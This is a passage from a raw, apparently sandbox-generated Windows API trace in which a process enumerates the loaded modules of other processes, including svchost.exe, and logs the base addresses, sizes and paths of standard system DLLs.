lpmodinfo=0x24f74d0, cb=0x18 | out: lpmodinfo=0x24f74d0*(lpBaseOfDll=0x7fef9530000, SizeOfImage=0x8000, EntryPoint=0x7fef9531414)) returned 1 [0072.733] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9530000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0072.737] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9530000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")) returned 0x20 [0072.740] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9220000, lpmodinfo=0x24f96a0, cb=0x18 | out: lpmodinfo=0x24f96a0*(lpBaseOfDll=0x7fef9220000, SizeOfImage=0xb000, EntryPoint=0x7fef92212e0)) returned 1 [0072.744] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9220000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="winrnr.dll") returned 0xa [0072.747] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9220000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll")) returned 0x1e [0072.751] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff2d0000, lpmodinfo=0x24fb860, cb=0x18 | out: lpmodinfo=0x24fb860*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0072.755] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff2d0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0072.758] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff2d0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0072.762] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd070000, lpmodinfo=0x24fda20, cb=0x18 | out: lpmodinfo=0x24fda20*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0072.766] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd070000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0072.769] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd070000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0072.773] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcd70000, lpmodinfo=0x24ffbe0, cb=0x18 | out: lpmodinfo=0x24ffbe0*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0072.777] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcd70000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0072.780] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcd70000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0072.784] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6fa0000, lpmodinfo=0x2501da0, cb=0x18 | out: lpmodinfo=0x2501da0*(lpBaseOfDll=0x7fef6fa0000, SizeOfImage=0x4f000, EntryPoint=0x7fef6fa2760)) returned 1 [0072.788] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6fa0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="audioses.dll") returned 0xc [0072.792] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6fa0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\audioses.dll" (normalized: "c:\\windows\\system32\\audioses.dll")) returned 0x20 [0072.796] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac20000, lpmodinfo=0x2503f70, cb=0x18 | out: lpmodinfo=0x2503f70*(lpBaseOfDll=0x7fefac20000, SizeOfImage=0x11000, EntryPoint=0x7fefac216ac)) returned 1 [0072.800] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac20000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0072.804] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac20000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")) returned 0x21 [0072.808] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac00000, lpmodinfo=0x2506140, cb=0x18 | out: lpmodinfo=0x2506140*(lpBaseOfDll=0x7fefac00000, SizeOfImage=0x18000, EntryPoint=0x7fefac01bf8)) returned 1 [0072.812] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac00000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0072.816] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac00000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")) returned 0x20 [0072.820] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefacb0000, lpmodinfo=0x2508310, cb=0x18 | out: lpmodinfo=0x2508310*(lpBaseOfDll=0x7fefacb0000, SizeOfImage=0x1c000, EntryPoint=0x7fefacb1060)) returned 1 [0072.824] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefacb0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wscsvc.dll") returned 0xa [0072.828] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefacb0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll")) returned 0x1e [0072.832] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3600000, lpmodinfo=0x250a4d0, cb=0x18 | out: lpmodinfo=0x250a4d0*(lpBaseOfDll=0x7fef3600000, SizeOfImage=0x125000, EntryPoint=0x7fef3651570)) returned 1 [0072.836] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3600000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="dbghelp.dll") returned 0xb [0072.840] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3600000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll")) returned 0x1f [0072.844] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9b80000, lpmodinfo=0x250c690, cb=0x18 | out: lpmodinfo=0x250c690*(lpBaseOfDll=0x7fef9b80000, SizeOfImage=0xe000, EntryPoint=0x7fef9b85500)) returned 1 [0072.848] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9b80000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wbemprox.dll") returned 0xc [0072.852] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9b80000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")) returned 0x25 [0072.857] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9e20000, lpmodinfo=0x250e868, cb=0x18 | out: lpmodinfo=0x250e868*(lpBaseOfDll=0x7fef9e20000, SizeOfImage=0x77000, EntryPoint=0x7fef9e5e7f0)) returned 1 [0072.861] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9e20000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wbemcomn2.DLL") returned 0xd [0072.866] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9e20000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbemcomn2.DLL" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")) returned 0x21 [0072.870] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd1e0000, lpmodinfo=0x2510e68, cb=0x18 | out: lpmodinfo=0x2510e68*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0072.873] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd1e0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0072.877] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd1e0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0072.881] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef98a0000, lpmodinfo=0x2513028, cb=0x18 | out: lpmodinfo=0x2513028*(lpBaseOfDll=0x7fef98a0000, SizeOfImage=0x13000, EntryPoint=0x7fef98a1d80)) returned 1 [0072.884] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef98a0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wbemsvc.dll") returned 0xb [0072.888] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef98a0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")) returned 0x24 [0072.891] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9bc0000, lpmodinfo=0x25151f8, cb=0x18 | out: lpmodinfo=0x25151f8*(lpBaseOfDll=0x7fef9bc0000, SizeOfImage=0xd3000, EntryPoint=0x7fef9c38b00)) returned 1 [0072.895] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9bc0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="fastprox.dll") returned 0xc [0072.899] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9bc0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")) returned 0x25 [0072.903] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef9b90000, lpmodinfo=0x25173d0, cb=0x18 | out: lpmodinfo=0x25173d0*(lpBaseOfDll=0x7fef9b90000, SizeOfImage=0x27000, EntryPoint=0x7fef9b911a0)) returned 1 [0072.906] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef9b90000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="NTDSAPI.dll") returned 0xb [0072.910] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef9b90000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NTDSAPI.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")) returned 0x1f [0072.914] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3550000, lpmodinfo=0x2519590, cb=0x18 | out: lpmodinfo=0x2519590*(lpBaseOfDll=0x7fef3550000, SizeOfImage=0xae000, EntryPoint=0x7fef3554104)) returned 1 [0072.918] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3550000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wuapi.dll") returned 0x9 [0072.922] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3550000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll")) returned 0x1d [0072.925] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9e0000, lpmodinfo=0x251b750, cb=0x18 | out: lpmodinfo=0x251b750*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0072.929] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0072.933] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0072.937] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd820000, lpmodinfo=0x251d910, cb=0x18 | out: lpmodinfo=0x251d910*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0072.941] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd820000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0072.945] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd820000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0072.949] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3530000, lpmodinfo=0x251fad0, cb=0x18 | out: lpmodinfo=0x251fad0*(lpBaseOfDll=0x7fef3530000, SizeOfImage=0x1b000, EntryPoint=0x7fef3531198)) returned 1 [0072.953] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3530000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="Cabinet.dll") returned 0xb [0072.957] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3530000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")) returned 0x1f [0072.961] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd830000, lpmodinfo=0x2521c90, cb=0x18 | out: lpmodinfo=0x2521c90*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0072.965] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd830000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0072.969] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd830000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0072.973] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd780000, lpmodinfo=0x2523e60, cb=0x18 | out: lpmodinfo=0x2523e60*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0072.977] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd780000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0072.981] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd780000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0072.985] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcb20000, lpmodinfo=0x2526020, cb=0x18 | out: lpmodinfo=0x2526020*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0072.989] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcb20000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0072.993] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcb20000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0072.998] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb9a0000, lpmodinfo=0x25281e0, cb=0x18 | out: lpmodinfo=0x25281e0*(lpBaseOfDll=0x7fefb9a0000, SizeOfImage=0x15000, EntryPoint=0x7fefb9a1050)) returned 1 [0073.002] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb9a0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wkscli.dll") returned 0xa [0073.006] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb9a0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")) returned 0x1e [0073.010] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb9c0000, lpmodinfo=0x252a3a0, cb=0x18 | out: lpmodinfo=0x252a3a0*(lpBaseOfDll=0x7fefb9c0000, SizeOfImage=0xc000, EntryPoint=0x7fefb9c18a4)) returned 1 [0073.014] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb9c0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="netutils.dll") returned 0xc [0073.018] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb9c0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")) returned 0x20 [0073.029] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a0) returned 0x214 [0073.029] EnumProcessModules (in: hProcess=0x214, lphModule=0x252e398, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x252e398, lpcbNeeded=0x23ee40) returned 1 [0073.032] GetModuleInformation (in: hProcess=0x214, hModule=0xff760000, lpmodinfo=0x252e608, cb=0x18 | out: lpmodinfo=0x252e608*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0073.032] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xff760000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0073.032] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xff760000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0073.032] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x2530800, cb=0x18 | out: lpmodinfo=0x2530800*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0073.033] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0073.033] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0073.033] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x25329d8, cb=0x18 | out: lpmodinfo=0x25329d8*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0073.034] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0073.034] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0073.035] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x2534ba8, cb=0x18 | out: lpmodinfo=0x2534ba8*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0073.035] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0073.035] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0073.036] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x2536d78, cb=0x18 | out: lpmodinfo=0x2536d78*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0073.036] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0073.037] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0073.037] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x2538f90, cb=0x18 | out: lpmodinfo=0x2538f90*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0073.038] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0073.038] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0073.039] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x253b150, cb=0x18 | out: lpmodinfo=0x253b150*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0073.039] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0073.040] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0073.040] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff760000, lpmodinfo=0x253d310, cb=0x18 | out: lpmodinfo=0x253d310*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0073.041] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff760000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0073.042] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff760000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0073.042] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x253f4d0, cb=0x18 | out: lpmodinfo=0x253f4d0*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0073.043] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0073.044] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0073.044] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x2541728, cb=0x18 | out: lpmodinfo=0x2541728*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0073.045] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0073.046] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0073.047] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x25438e8, cb=0x18 | out: lpmodinfo=0x25438e8*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0073.047] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0073.048] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0073.049] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x2545a98, cb=0x18 | out: lpmodinfo=0x2545a98*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0073.050] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0073.051] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0073.051] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x2547c58, cb=0x18 | out: lpmodinfo=0x2547c58*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0073.052] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0073.053] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0073.054] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x2549e18, cb=0x18 | out: lpmodinfo=0x2549e18*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0073.055] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0073.056] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0073.057] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x254bfd8, cb=0x18 | out: lpmodinfo=0x254bfd8*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0073.058] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0073.059] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0073.060] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x254e1a8, cb=0x18 | out: lpmodinfo=0x254e1a8*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0073.061] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0073.062] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0073.063] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef41c0000, lpmodinfo=0x2550378, cb=0x18 | out: lpmodinfo=0x2550378*(lpBaseOfDll=0x7fef41c0000, SizeOfImage=0x34000, EntryPoint=0x7fef41e9228)) returned 1 [0073.064] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef41c0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ssdpsrv.dll") returned 0xb [0073.065] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef41c0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\ssdpsrv.dll" (normalized: "c:\\windows\\system32\\ssdpsrv.dll")) returned 0x1f [0073.066] GetModuleInformation (in: hProcess=0x214, 